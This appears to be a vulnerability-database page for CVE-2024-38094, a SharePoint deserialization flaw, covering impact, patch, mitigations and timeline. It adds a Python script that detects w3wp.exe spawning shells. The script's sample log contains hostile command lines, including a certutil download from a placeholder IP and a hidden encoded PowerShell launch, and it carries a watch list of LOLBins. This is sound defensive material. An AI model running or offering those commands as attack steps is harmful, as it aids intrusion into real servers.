Exploit
CVE-2024-38094

Deserialization of Untrusted Data (CWE-502)

Published: Jul 9, 2024

CVSS 7.2 | EPSS 0.05% | Severity: High

Summary

A remote code execution vulnerability exists in Microsoft SharePoint Server, caused by deserialization of untrusted data (CWE-502). It affects SharePoint Server 2019, SharePoint Server Subscription Edition, and SharePoint Enterprise Server 2016, and carries a CVSS v3.1 base score of 7.2 (High).

Impact

An authenticated attacker who holds Site Owner permissions on a SharePoint site can inject arbitrary code and have it executed in the context of SharePoint Server. That yields the privileges of the SharePoint application pool account on the host and, because farm servers are domain-joined and the application pool identity is usually a domain account, a foothold from which to move laterally. Confidentiality, integrity and availability are all rated High. The vector is network-reachable, low complexity and needs no user interaction; the only brake is the High privileges-required metric, which is why the score is 7.2 rather than the 9.8 the same vector would carry with no privileges required. Site Owner is a routinely delegated role, and a phished or reused credential supplies it, so that brake should not be relied on for an internet-facing farm.

Exploitation

No public proof-of-concept had been identified at the time of this entry. The vulnerability is nonetheless exploited in the wild: CISA added it to the Known Exploited Vulnerabilities catalog in October 2024, and Rapid7 investigated a compromise traced to a public-facing SharePoint server (see References). Exploitation has also been reported by securityonline.info.

Patch

A patch is available. Microsoft released the fix in the July 9, 2024 security updates. Apply the SharePoint security update for your version, then run the SharePoint Products Configuration Wizard (psconfig) on every server in the farm; a SharePoint update whose binaries are installed but whose configuration step has not been run leaves the farm in a partially patched state.

Mitigation

1. Apply the Microsoft security update immediately and complete the configuration step on every farm server.
2. Implement network segmentation and restrict access to SharePoint servers; an internet-facing farm should sit behind an authenticating proxy or VPN where the business allows it.
3. Monitor SharePoint servers for suspicious activity, in particular the IIS worker process (w3wp.exe) spawning shells or living-off-the-land binaries, and authentication from the SharePoint application pool account to hosts it has no reason to touch.
4. Keep SharePoint and related software up to date with the latest security patches.
5. Implement the principle of least privilege for SharePoint user accounts and services. Because exploitation requires Site Owner permissions, audit who holds Site Owner or Full Control on internet-facing site collections and remove stale or over-broad grants; run the application pool under a dedicated low-privilege service account rather than a farm or domain administrator.
6. If immediate patching is not possible, consider temporarily disabling or isolating affected SharePoint servers until the patch can be applied.
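The Rapid7 reference below describes what exploitation looks like on the host: process executions originating from a public-facing SharePoint server. The following is an added example, not code from this page, from Microsoft or from Rapid7, of the detection logic item 3 asks for. It scans Sysmon-style process-creation records for the IIS worker process w3wp.exe spawning shells and living-off-the-land binaries, which is how server-side code execution in SharePoint surfaces on the endpoint regardless of the deserialization gadget used. The log lines, the account CONTOSO\svc_spapppool, the paths and the 203.0.113.7 address are constructed; the flat key=value rendering of Sysmon Event ID 1 is an assumption made for readability.

```python
import ntpath
import re
from dataclasses import dataclass

# Children that a SharePoint application pool has no business spawning.
# csc.exe and cvtres.exe are deliberately absent: ASP.NET dynamic compilation
# launches them from w3wp.exe on every healthy farm, so alerting on them is noise.
SUSPICIOUS_CHILDREN = {
    "cmd.exe", "powershell.exe", "pwsh.exe", "certutil.exe", "bitsadmin.exe",
    "mshta.exe", "rundll32.exe", "regsvr32.exe", "wscript.exe", "cscript.exe",
    "net.exe", "net1.exe", "whoami.exe", "nltest.exe",
}
IIS_WORKER = "w3wp.exe"

# Constructed sample records (not real telemetry): one benign ASP.NET compile,
# three shells/LOLBins spawned by w3wp.exe, and one interactive admin shell.
SAMPLE_LOG = r"""
2024-07-10T10:13:55Z EventID=1 Image=C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe ParentImage=C:\Windows\System32\inetsrv\w3wp.exe User=CONTOSO\svc_spapppool CommandLine="csc.exe /noconfig /fullpaths @C:\inetpub\temp\App_Web_layout.cmdline"
2024-07-10T10:14:02Z EventID=1 Image=C:\Windows\System32\cmd.exe ParentImage=C:\Windows\System32\inetsrv\w3wp.exe User=CONTOSO\svc_spapppool CommandLine="cmd.exe /c whoami"
2024-07-10T10:14:09Z EventID=1 Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentImage=C:\Windows\System32\inetsrv\w3wp.exe User=CONTOSO\svc_spapppool CommandLine="powershell.exe -nop -w hidden -enc SQBFAFgA"
2024-07-10T10:20:31Z EventID=1 Image=C:\Windows\System32\cmd.exe ParentImage=C:\Windows\explorer.exe User=CONTOSO\spadmin CommandLine="cmd.exe"
2024-07-10T10:21:47Z EventID=1 Image=C:\Windows\System32\certutil.exe ParentImage=C:\Windows\System32\inetsrv\w3wp.exe User=CONTOSO\svc_spapppool CommandLine="certutil.exe -urlcache -split -f http://203.0.113.7/s.txt C:\Windows\Temp\s.txt"
"""

# key=value pairs; values are either "quoted with spaces" or a bare run of non-space.
_KV = re.compile(r'(\w+)=("([^"]*)"|(\S+))')


@dataclass(frozen=True)
class Finding:
    timestamp: str
    user: str
    child: str
    command_line: str


def parse_record(line: str) -> dict:
    """Turn one '<ts> key=value key="quoted value"' line into a dict; timestamp under 'ts'."""
    ts, _, rest = line.partition(" ")
    fields = {"ts": ts}
    for key, _whole, quoted, bare in _KV.findall(rest):
        fields[key] = quoted if quoted else bare
    return fields


def is_suspicious_spawn(rec: dict) -> bool:
    """True when the IIS worker process is the parent and the child is on the watch list."""
    parent = ntpath.basename(rec.get("ParentImage", "")).lower()
    child = ntpath.basename(rec.get("Image", "")).lower()
    return parent == IIS_WORKER and child in SUSPICIOUS_CHILDREN


def find_suspicious(log_text: str) -> list[Finding]:
    """Scan process-creation records and return every w3wp.exe -> shell/LOLBin spawn."""
    findings = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        rec = parse_record(line)
        if rec.get("EventID") == "1" and is_suspicious_spawn(rec):
            findings.append(Finding(
                timestamp=rec["ts"],
                user=rec.get("User", "?"),
                child=ntpath.basename(rec["Image"]).lower(),
                command_line=rec.get("CommandLine", ""),
            ))
    return findings


if __name__ == "__main__":
    for f in find_suspicious(SAMPLE_LOG):
        print(f"{f.timestamp} {f.user} w3wp.exe -> {f.child}: {f.command_line}")
```

The explorer.exe-parented cmd.exe is left alone because parentage, not the child name, is what makes the spawn anomalous; the csc.exe compile is left alone because suppressing it in the watch list is cheaper than teaching every analyst that ASP.NET compiles on demand. In a real deployment the same rule is expressed in the SIEM over Sysmon Event ID 1 or Security Event ID 4688 with command-line auditing enabled, and the application pool account's logons to other hosts (the Exchange service account activity in the Rapid7 case) are the second rule to write.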

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Timeline

CVSS

A CVSS base score of 7.2 has been assigned.

Jul 9, 2024 at 5:05 PM / microsoft
CVE Assignment

NVD published the first details for CVE-2024-38094

Jul 9, 2024 at 5:15 PM
First Article

Feedly found the first article mentioning CVE-2024-38094. See article

Jul 9, 2024 at 5:17 PM / Vulners.com RSS Feed
CVSS Estimate

Feedly estimated the CVSS score as HIGH

Jul 9, 2024 at 5:36 PM
Trending

This CVE started to trend in security discussions

Jul 9, 2024 at 7:13 PM
Detection in Vulnerability Scanners

Detection for the vulnerability has been added to Nessus (202035)

Jul 9, 2024 at 11:15 PM
EPSS

EPSS Score was set to: 0.05% (Percentile: 19.6%)

Jul 10, 2024 at 10:14 AM
Exploitation in the Wild

Attacks in the wild have been reported by Cybersecurity News. See article

Jul 10, 2024 at 10:20 AM / Cybersecurity News
Trending

This CVE stopped trending in security discussions

Jul 12, 2024 at 8:36 PM

Affected Systems

Microsoft/sharepoint_server

Proof Of Exploit

https://www.cisa.gov/known-exploited-vulnerabilities-catalog

Patches

Microsoft

Attack Patterns

CAPEC-586: Object Injection

References

Investigating a SharePoint Compromise: IR Tales from the Field
Rapid7 began exploring suspicious activity that involved process executions tied to a Microsoft Exchange service account. Further analysis of authentication events from the domain controller indicated this malicious activity was sourced from a public-facing SharePoint server.

News

CISA: CISA Adds One Known Exploited Vulnerability to Catalog
BOD 22-01 requires Federal Civilian Executive Branch (FCEB) agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. Although BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of Catalog vulnerabilities as part of their vulnerability management practice.
PAN-OS Firewall Vulnerability Under Active Exploitation – IoCs Released
Palo Alto Networks has released new indicators of compromise (IoCs) a day after the network security vendor confirmed that a new zero-day vulnerability impacting its PAN-OS firewall management interface has been actively exploited in the wild. To that end, the company said it observed malicious activity originating from below IP addresses and targeting PAN-OS management web interface IP

CVSS V3.1

Attack Vector:Network
Attack Complexity:Low
Privileges Required:High
User Interaction:None
Scope:Unchanged
Confidentiality:High
Integrity:High
Availability Impact:High
